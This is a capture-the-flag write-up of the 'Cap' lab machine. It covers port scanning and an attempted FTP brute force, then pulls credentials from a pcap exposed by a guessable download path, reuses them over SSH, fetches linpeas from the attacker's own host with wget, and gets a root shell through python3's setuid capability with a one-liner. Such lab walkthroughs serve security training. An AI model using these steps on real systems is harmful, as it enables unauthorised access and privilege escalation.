cap-banner.png

Cap - WriteUp


External Recon

As always we start to get a lay of the land with our default “nmap” scan:

nmap -sC -sV 10.10.10.245

PORT   STATE SERVICE VERSION
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn

Nothing unusual so far. However, since we have some version numbers let’s check them with searchsploit.

searchsploit

Nothing for vsftp. OpenSSH looks quite new but I suggest checking it aswell. I just made a mental note to come back to SSH should other paths seem to be a dead end. Gunicorn had no version number, so I skipped the searchsploit aswell. But we can take a look at the website itself.

[Top]

Explore

First thing I noticed is the authenticated user named “Nathan”. Could be handy if we want to bruteforce SSH or FTP. I actually tried bruteforcing FTP with the username “nathan” and the “rockyou” wordlist. But I got blacklisted. So that was a dead end.

Let’s play with the webapp. I tried to logout and view the settings. But these functions are not implemented. So nothing to gain here. The next thing I looked at was the menu entry “IP Config” and “Network Status”.

menu

Both entries return console output of the kind you would expect. IP Config returned the IP Config of the box for example. Sometimes developers try to be efficient and pass parameters from the website to the backend. A perfect target for code injection. Not this time though. Both outputs seemed to be static and not triggered by some sort of PHP script.

I then took a look at the last entry “Security Snapshot”. On the website I got some network traffic statistics and an option to download a pcap file of said traffic.

networktraffic

In the screenshot above you can see, there was no traffic. And the pcap was also empty. Hm. What now?

Well. We know that “Nathan” logged in at some point. Maybe we can find some credentials in the pcap? Looking at the URL bar, we can see that there’s a “3” behind the folder “data”. And the pcap-name we downloaded aligns with that number.

download

Let’s check if there’s a “2.pcap”. And there is. Albeit empty too.

download2

There’s even a “0.pcap”. And this one has indeed data in it. Let’s download it and open it with wireshark.

creds

Awesome. We have his FTP credentials.

[Top]

Exploit

Let’s login with our new credentials via SSH. Why SSH? Well, it’s an easy box. Nathan probably reused his password, and SSH is far more interessting than FTP. And if it doesn’t work, we can come back to FTP.

nathan

Told you. Oh, we also have the user flag here.

[Top]

Internal Recon

Once I am on a machine, I do two things. I check if sudo -l gives me some insights and I upload linpeas.sh. To do that I fire up a simple http server on my own machine with python3 -m http.server 80 and download the file via wget http://<ip>/linpeas.sh.

linpeas

After launching it and going through the output my eyes fell on this entry.

capabilities

[Top]

Privilege Escalation

Capabilities are often easy to exploit. They are explained here. In this case python3 has been allowed to change the UID of a new process. Which means we can start a new process, let’s say /bin/sh, with UID 0 aka root - we will have root permissions.

Let’s try it.

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

root

Great. It worked as expected. We can take the root flag and finish the box.

That’s it for today. Have a nice one!

x41

[Top]

Previous Post Next Post Home
x41 avatar
x41
IT-Security consultant by day. InfoSec enthusiast and Dungeon-Master at night.